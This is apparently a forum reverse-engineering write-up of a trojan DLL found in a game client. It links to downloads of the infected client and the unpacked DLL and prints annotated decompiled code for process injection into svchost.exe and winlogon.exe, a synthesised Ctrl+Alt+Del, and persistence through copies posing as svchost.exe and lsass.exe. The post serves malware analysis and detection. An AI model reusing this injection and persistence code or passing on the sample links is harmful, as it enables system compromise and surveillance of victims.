IGC S18 Client WZ_Z.dll Reverse-Engineering Analysis.
Client sample: IGC Season 18 Part 1-3 client.
Trojan file: wz_z.dll.
Download link:
FullClient(Sample):
https://mega.nz/file/fRoDgKjI#UEJMEZ...JsisZh9R_bEUy4
NoDataFolderClient(Sample):
https://mega.nz/file/fNAF3SaB#KevEeB...Xph75W94QrCyx4
Unpacked Trojan dll:
https://mega.nz/file/fNAF3SaB#KevEeB...Xph75W94QrCyx4
Trojan behavior:
+Remotely monitors the user's screen and desktop.
+Steals user files.
+Injects into critical Windows system processes.
+Records mouse and keyboard events.
+Infects the user's DNS settings.
+Etc.
Note: the client contains the Trojan DLL, so antivirus software will flag it. Download and unrar it only inside a virtual machine or another isolated environment.
wz_z.dll Trojan — critical code:
Attachment 173213
DLL entry point:
// DLL entry point. On DLL_PROCESS_ATTACH (fdwReason == 1) it starts one
// worker thread and never starts a second one: dword_1003055C is a global
// run-once counter. hinstDLL is saved in the global hModule, which
// Trojan_Inject_Entry later passes to GetModuleFileNameA to learn the DLL's
// own path. Thread attach/detach and process detach are ignored.
// Detection note: the implant runs from DllMain via CreateThread, not from
// any export the game client itself calls.
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
hModule = hinstDLL;
// 1 == DLL_PROCESS_ATTACH; the counter makes this a single-shot start.
if ( fdwReason == 1 && dword_1003055C < 1 )
{
++dword_1003055C;
// StartAddress is the worker routine (not shown on this page).
CreateThread(0, 0, StartAddress, 0, 0, 0);
}
return 1;
} |
// "StartServer" is the entry name Trojan_Inject_SysCritical passes to
// Trojan_Inject_Entry for the svchost.exe target, so this presumably runs
// inside the injected process. Src is the parameter block handed to the
// routine; Src itself goes to sub_1000D990 and Src + 256 to sub_1000A7A0
// (both unresolved on this page).
// Sequence: raise token privileges, take desktop/window-station access twice
// (v3, v2), create the named mutex, initialise Winsock 2.2 (0x202), then park
// the thread forever in a Sleep(1000) loop. The window-station restore and
// `return 0` are reached only if WSAStartup fails.
// `Name` is a global; in the injector it is formatted as "Wait_%s" (see
// Trojan_Inject_SysCritical). Whether the injected copy holds the same value
// is not visible here.
char __cdecl StartServer(CHAR *Src)
{
HDESK v2[4]; // [esp+4h] [ebp-2DCh] BYREF
HDESK v3[4]; // [esp+14h] [ebp-2CCh] BYREF
struct WSAData WSAData; // [esp+24h] [ebp-2BCh] BYREF
char v5[296]; // [esp+1B4h] [ebp-12Ch] BYREF
Trojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v3);
Trojan_GetUserDesktopAccess(v2);
CreateMutexA(0, 0, Name);
if ( !WSAStartup(0x202u, &WSAData) )
{
sub_1000A970(v5);
sub_1000A7A0(Src + 256);
sub_1000D990(Src);
// Never returns on the success path; the thread stays alive in the host.
while ( 1 )
Sleep(0x3E8u);
}
Trojan_SetProcessWindowStation(v2);
Trojan_SetProcessWindowStation(v3);
return 0;
} |
// Window-enumeration callback: searches for a window whose class name is
// "Internet Explorer_Server" and stores its HWND through a2.
// Returns 1 (keep enumerating) while the class does not match. On a match
// `result` is the _mbscmp value, i.e. 0, so the function stores the handle
// and returns 0 (stop enumerating). Presumably a2 is the lParam out-pointer
// supplied by the enumerating caller (not shown).
// GetClassNameA's return value is not checked; on failure ClassName is
// compared uninitialised.
BOOL __stdcall EnumFunc(HWND hWnd, _DWORD *a2)
{
BOOL result; // eax
CHAR ClassName[100]; // [esp+8h] [ebp-68h] BYREF
GetClassNameA(hWnd, ClassName, 100);
result = _mbscmp((const unsigned __int8 *)ClassName, "Internet Explorer_Server");
if ( result )
return 1;
*a2 = hWnd;
return result;
} |
// Synthesises the Secure Attention Sequence. Two desktop-switch objects are
// set up against the "Winlogon" desktop, then WM_HOTKEY (0x312) is broadcast
// to every top-level window with lParam 3014659 == 0x2E0003: high word 0x2E
// is VK_DELETE, low word 0x3 is MOD_ALT | MOD_CONTROL — i.e. a fake
// Ctrl+Alt+Del. The desktop objects are then released in reverse order.
// Always returns 1.
// Detection note: a game-client process posting WM_HOTKEY to HWND_BROADCAST
// after switching to the Winlogon desktop is a strong anomaly.
char DownCtrlAltDel()
{
char v1[16]; // [esp+0h] [ebp-20h] BYREF
char v2[16]; // [esp+10h] [ebp-10h] BYREF
Trojan_SetThreadDesktop_Entry(v1, "Winlogon");
Trojan_SetThreadDesktop_Entry(v2, "Winlogon");
// 0x312 = WM_HOTKEY; 3014659 = 0x2E0003 = VK_DELETE | (MOD_ALT|MOD_CONTROL).
PostMessageA(HWND_BROADCAST, 0x312u, 0, 3014659);
Trojan_SetProcessWindowStation((int)v2);
Trojan_SetProcessWindowStation((int)v1);
return 1;
} |
// "WaitServer" is the entry name Trojan_Inject_SysCritical passes when it
// injects into winlogon.exe (with String1 as the parameter block), so Src
// presumably points at that block inside the injected process.
// Takes desktop access twice (v2, v3), calls Trojan_CopyFile(Src, 0, 1) —
// with lpServiceName == 0 that call goes down Trojan_CopyFile's `else`
// branch, which may re-enter itself with the global ServiceName — then
// releases the desktop handles in reverse order. Always returns 0.
char __cdecl WaitServer(void *Src)
{
HDESK v2[4]; // [esp+0h] [ebp-20h] BYREF
HDESK v3[4]; // [esp+10h] [ebp-10h] BYREF
Trojan_GetUserDesktopAccess(v2);
Trojan_GetUserDesktopAccess(v3);
Trojan_CopyFile(Src, 0, 1);
Trojan_SetProcessWindowStation((int)v3);
Trojan_SetProcessWindowStation((int)v2);
return 0;
} |
// Prepares the parameter block for a remote injection and hands it to
// Trojan_Inject. The four locals v5, Filename, v7 and v8 are contiguous on the
// stack ([ebp-448h] .. [ebp-230h]) and together span 16 + 260 + 260 + 556 =
// 1092 = 0x444 bytes — exactly the size passed as the fifth argument — so v5
// is the start of one struct, not an independent array. Do not reorder them.
//   v5[0..2] : addresses of LoadLibraryA / GetProcAddress / FreeLibrary
//              resolved from kernel32.dll for the injected routine to use
//   Filename : this DLL's own path (hModule is set in DllMain), 0x104 = MAX_PATH
//   v7       : a3, the entry name ("StartServer" / "WaitServer" from the
//              caller) — copied with an unbounded strcpy into 260 bytes
//   v8       : 556 bytes copied verbatim from a2, the caller's data block
// dwProcessId is the target PID. sub_100067B0 is the routine written into the
// target (0x800 bytes); 0x3E8 (1000) is presumably a millisecond timeout —
// not verifiable from this page.
int __cdecl Trojan_Inject_Entry(DWORD dwProcessId, const void *a2, const char *a3)
{
HMODULE ModuleHandleA; // edi
int v5[4]; // [esp+Ch] [ebp-448h] BYREF
CHAR Filename[260]; // [esp+1Ch] [ebp-438h] BYREF
char v7[260]; // [esp+120h] [ebp-334h] BYREF
char v8[556]; // [esp+224h] [ebp-230h] BYREF
ModuleHandleA = GetModuleHandleA("kernel32.dll");
v5[1] = (int)GetProcAddress(ModuleHandleA, "GetProcAddress");
v5[0] = (int)GetProcAddress(ModuleHandleA, "LoadLibraryA");
v5[2] = (int)GetProcAddress(ModuleHandleA, "FreeLibrary");
// Unbounded copy of the entry name; no length check against 260.
strcpy(v7, a3);
GetModuleFileNameA(hModule, Filename, 0x104u);
qmemcpy(v8, a2, sizeof(v8));
// 0x444 covers v5 + Filename + v7 + v8 as one contiguous block.
return Trojan_Inject(dwProcessId, sub_100067B0, 0x800u, v5, 0x444u, 0x3E8u);
} |
// Drives the injection into system processes. Flow as visible here:
//  1. raise token privileges and take desktop access (v6, v5);
//  2. build a string object in v13 / lpString2 (sub_10008060) and copy it to
//     the global ::String1 — the `v15 < 0x10` test chooses the inline buffer
//     over the heap pointer, which looks like MSVC's std::string short-string
//     layout (TODO confirm);
//  3. format three global names from v12 — "Wait_%s", "Start_Wait_%s",
//     "StopWait_%s" (Name, aVipshellEventS, aVipshellEventS_0) — and create
//     the mutex `Name`; 183 == ERROR_ALREADY_EXISTS, so a second instance
//     skips the whole injection block;
//  4. busy-wait (no Sleep) until a winlogon.exe process exists;
//  5. inject with entry "StartServer" into svchost.exe using v11 as data, and
//     with entry "WaitServer" into winlogon.exe using the local String1;
//  6. tear down objects. v16 / LOBYTE(v16) looks like the compiler's
//     exception-unwind state counter rather than program logic.
// Note the local `CHAR String1[556]` shadows the global `::String1`: the
// first lstrcpyA targets the global, the second targets the local.
// FindWindowA("Notepad", 0) discards its result — dead or leftover call.
// Detection: the Wait_ / Start_Wait_ / StopWait_ name prefixes, and the
// svchost.exe + winlogon.exe injection pair.
char Trojan_Inject_SysCritical()
{
const CHAR *v0; // eax
DWORD v1; // esi
DWORD v2; // eax
const CHAR *v3; // eax
HDESK v5[4]; // [esp+10h] [ebp-524h] BYREF
HDESK v6[4]; // [esp+20h] [ebp-514h] BYREF
void *v7; // [esp+30h] [ebp-504h] BYREF
int v8; // [esp+34h] [ebp-500h]
int v9; // [esp+38h] [ebp-4FCh]
CHAR String1[556]; // [esp+40h] [ebp-4F4h] BYREF
int v11[89]; // [esp+26Ch] [ebp-2C8h] BYREF
char v12[200]; // [esp+3D0h] [ebp-164h] BYREF
char v13[112]; // [esp+498h] [ebp-9Ch] BYREF
LPCSTR lpString2[5]; // [esp+508h] [ebp-2Ch] BYREF
unsigned int v15; // [esp+51Ch] [ebp-18h]
int v16; // [esp+530h] [ebp-4h]
Trojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v6);
v16 = 0;
Trojan_GetUserDesktopAccess(v5);
LOBYTE(v16) = 1;
sub_10008060((int)v13);
v0 = lpString2[0];
LOBYTE(v16) = 2;
// Inline-buffer vs heap-pointer selection (short-string layout, presumably).
if ( v15 < 0x10 )
v0 = (const CHAR *)lpString2;
// Copies into the GLOBAL String1 (the local of the same name is used below).
lstrcpyA(::String1, v0);
sub_10009C70(v11);
// Host indicators: mutex/event names derived from v12.
sprintf(Name, "Wait_%s", v12);
sprintf(aVipshellEventS, "Start_Wait_%s", v12);
sprintf(aVipshellEventS_0, "StopWait_%s", v12);
CreateMutexA(0, 0, Name);
// 183 == ERROR_ALREADY_EXISTS: only the first instance injects.
if ( GetLastError() != 183 )
{
// Spins without sleeping until winlogon.exe is found.
do
v1 = Trojan_FindProcessWithExeName("winlogon.exe");
while ( !v1 );
v7 = 0;
v8 = 0;
v9 = 0;
LOBYTE(v16) = 3;
sub_10009E40(&v7);
// Result unused.
FindWindowA("Notepad", 0);
v2 = Trojan_FindProcessWithExeName("svchost.exe");
Trojan_Inject_Entry(v2, (int)v11, (int)"StartServer");
v3 = lpString2[0];
if ( v15 < 0x10 )
v3 = (const CHAR *)lpString2;
// Copies into the LOCAL String1[556].
lstrcpyA(String1, v3);
Trojan_Inject_Entry(v1, (int)String1, (int)"WaitServer");
if ( v7 )
operator delete(v7);
v7 = 0;
v8 = 0;
v9 = 0;
}
LOBYTE(v16) = 1;
sub_10007A20(v13);
LOBYTE(v16) = 0;
Trojan_SetProcessWindowStation((int)v5);
v16 = -1;
Trojan_SetProcessWindowStation((int)v6);
return 0;
} |
// Constructor of CScreenControlProc (the vtable it installs); the class name
// suggests the screen-monitoring component from the behaviour list, but only
// the setup is visible here. Runs the base initialiser sub_10001E80, writes
// the vtable pointer at offset 0, initialises a sub-object at this + 3
// (sub_10004E50), acquires desktop access into this + 16, and stores the
// current tick count in this[15] — presumably a start timestamp (not
// verifiable here). `this` is typed HDESK* by the decompiler, so all offsets
// are in 4-byte slots. Returns `this`.
HDESK *__thiscall Trojan_ScreenControl(HDESK *this)
{
sub_10001E80();
*this = (HDESK)&CScreenControlProc::`vftable';
sub_10004E50(this + 3);
Trojan_GetUserDesktopAccess(this + 16);
this[15] = (HDESK)GetTickCount();
return this;
} |
// Installation / persistence routine (partial listing — two stretches are
// omitted by the author, so local declarations and part of the body are not
// visible here).
// With lpServiceName set: copies Src to a path built by sub_100083B0 from v23
// plus "wins" and named "svchost.exe", repoints the service lpServiceName at
// that copy (Trojan_ChangeServiceConfig), deletes the copy when a3 == 0, then
// repeats the pattern with a "ShellExt"-derived path named "lsass.exe" and,
// after the omitted part, a third copy in v27 named "svchost.exe" that is
// either kept (a3 != 0) or removed after sub_10007EC0 on Dependencies.
// With lpServiceName == 0: runs sub_10009C70(v20) and, if that succeeds,
// re-enters itself with the global ServiceName.
// The repeated `if ( vN < 0x10 ) v = (const CHAR *)buf;` checks select an
// inline buffer over a heap pointer — looks like MSVC's std::string
// short-string layout (TODO confirm); the block before the final return
// resets each such string to empty (capacity 15). v36 / LOBYTE(v36) looks
// like the compiler's exception-unwind state, not program logic.
// Detection: copies named svchost.exe / lsass.exe under paths derived from
// v23 (base directory not visible here), and service configuration changes
// pointing at them.
int __cdecl Trojan_CopyFile(char *Src, LPCSTR lpServiceName, int a3)
{
..................Omitted here............................
if ( lpServiceName )
{
sub_10008060();
v36 = 0;
sub_10007DC0((char *)lpExistingFileName, Src, strlen(Src));
sub_100083B0(lpNewFileName, (int)v23, "wins");
LOBYTE(v36) = 1;
// Destination file name masquerades as svchost.exe.
sub_10007BB0((int)lpNewFileName, (void *)"svchost.exe", 0xBu);
v4 = lpNewFileName[0];
if ( v30 < 0x10 )
v4 = (const CHAR *)lpNewFileName;
v5 = lpExistingFileName[0];
if ( v26 < 0x10 )
v5 = (const CHAR *)lpExistingFileName;
// Return value of CopyFileA is not checked.
CopyFileA(v5, v4, 0);
v6 = lpNewFileName[0];
if ( v30 < 0x10 )
v6 = (const CHAR *)lpNewFileName;
// Existing service is repointed at the dropped copy.
Trojan_ChangeServiceConfig(lpServiceName, v6);
if ( !(_BYTE)a3 )
{
v7 = lpNewFileName[0];
if ( v30 < 0x10 )
v7 = (const CHAR *)lpNewFileName;
DeleteFileA(v7);
}
sub_100083B0(lpFileName, (int)v23, "ShellExt");
LOBYTE(v36) = 2;
// Second dropped copy masquerades as lsass.exe.
sub_10007BB0((int)lpFileName, "lsass.exe", 9u);
..................Omitted here............................
sub_10007BB0((int)v27, (void *)"svchost.exe", 0xBu);
v16 = v27[0];
if ( v28 < 0x10 )
v16 = (const CHAR *)v27;
v17 = lpExistingFileName[0];
if ( v26 < 0x10 )
v17 = (const CHAR *)lpExistingFileName;
CopyFileA(v17, v16, 0);
if ( (_BYTE)a3 )
{
v18 = (LPCSTR *)v27[0];
if ( v28 < 0x10 )
v18 = v27;
sub_10007EC0(v18, 0);
}
else
{
sub_10007EC0((void *)Dependencies, 0);
v19 = v27[0];
if ( v28 < 0x10 )
v19 = (const CHAR *)v27;
DeleteFileA(v19);
}
// Inlined string destructors: free heap buffers, reset to empty/capacity 15.
if ( v28 >= 0x10 )
operator delete((void *)v27[0]);
v28 = 15;
v27[4] = 0;
LOBYTE(v27[0]) = 0;
if ( v35 >= 0x10 )
operator delete((void *)v33[0]);
v35 = 15;
v34 = 0;
LOBYTE(v33[0]) = 0;
if ( v32 >= 0x10 )
operator delete((void *)lpFileName[0]);
v32 = 15;
lpFileName[4] = 0;
LOBYTE(lpFileName[0]) = 0;
if ( v30 >= 0x10 )
operator delete((void *)lpNewFileName[0]);
v30 = 15;
lpNewFileName[4] = 0;
LOBYTE(lpNewFileName[0]) = 0;
v36 = -1;
return sub_10007A20();
}
else
{
// No service name given: try sub_10009C70 and re-enter with the global ServiceName.
result = sub_10009C70(v20);
if ( (_BYTE)result )
return Trojan_CopyFile(Src, ServiceName, a3);
}
return result;
} |
Etc.